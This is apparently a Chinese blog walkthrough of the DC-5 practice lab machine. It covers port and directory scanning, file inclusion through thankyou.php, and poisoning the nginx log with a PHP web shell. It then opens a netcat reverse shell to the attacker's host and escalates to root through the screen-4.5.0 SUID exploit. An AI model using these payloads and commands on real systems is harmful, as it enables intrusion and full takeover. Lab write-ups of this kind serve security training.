• DC-5靶机


    仅供个人娱乐

    靶机信息

    下载地址:http://www.five86.com/downloads/DC-5.zip

    一、主机扫描

    arp-scan -l

    nmap -p 1-65535 -A  -sV 192.168.17.131

    二、信息收集

    dirb http://192.168.17.131 /usr/share/wordlists/dirb/big.txt

    用kali自带工具wfuzz(自带字典)扫描文件

    cd /usr/share/wordlists/wfuzz/general

    wfuzz -w /usr/share/wordlists/wfuzz/general/test.txt http://192.168.17.131/FUZZ.php

    三、漏洞利用

    利用文件包含

    远程文件包含

    日志

    http://192.168.25.135/thankyou.php?file=/var/log/nginx/access.log 

    http://192.168.17.131/thankyou.php?file=/var/log/nginx/error.log 

    重置靶机 ip 换为http://192.168.17.132

    写入一句话

    GET <?php system($_GET['cmd']); ?> HTTP/1.1

    http://192.168.17.132/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.17.129 8888

    root@kali:~/桌面# nc -lvvp 8888

    或者使用

    GET /thankyou.php?file=<?php @eval($_REQUEST[cmd]);?> HTTP/1.1

    python -c 'import pty;pty.spawn("/bin/bash")'

    查找www-data用户具有suid权限的命令

    find / -perm -4000 2>/dev/null

    发现命令   /bin/screen-4.5.0

    根据内容进行编译 直接上传出现问题,在kali编译在蚁剑上传

    root@kali:/tmp# vi libhax.c

    root@kali:/tmp# gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

    root@kali:/tmp# rm -f /tmp/libhax.c

    root@kali:/tmp# vi rootshell.c

    root@kali:/tmp# gcc -o /tmp/rootshell /tmp/rootshell.c

    root@kali:/tmp# rm -f /tmp/rootshell.c

    蚁剑上传

    或者使用

    scp root@192.168.17.129:/tmp/libhax.so /tmp/

    scp root@192.168.17.129:/tmp/rootshell /tmp/

    继续按照脚本

    将41154.sh中剩下部分代码另存为dc5.sh脚本文件

    并在保存dc5.sh文件输入:set ff=unix ,否则在执行脚本文件时后出错

    www-data@dc-5:/tmp$ chmod+x toroot.sh

    www-data@dc-5:/tmp$./toroot.sh

  • 相关阅读:
    【LeetCode & 剑指offer刷题】数组题18:Plus One
    SQL Server 2005 的动态管理视图DMV和函数DMF
    数据库SQL优化大总结之 百万级数据库优化方案
    误删SQL Server日志文件后怎样附加数据库
    教你建立SQL数据库的表分区
    Sql Server 阻塞的常见原因和解决办法
    SQL索引优化方法
    详解如何定义SQL Server外关键字约束
    写出高性能SQL语句的十三条法则
    SQL SERVER内部函数大全
  • 原文地址:https://www.cnblogs.com/bingtang123/p/12838415.html
Copyright © 2020-2023  润新知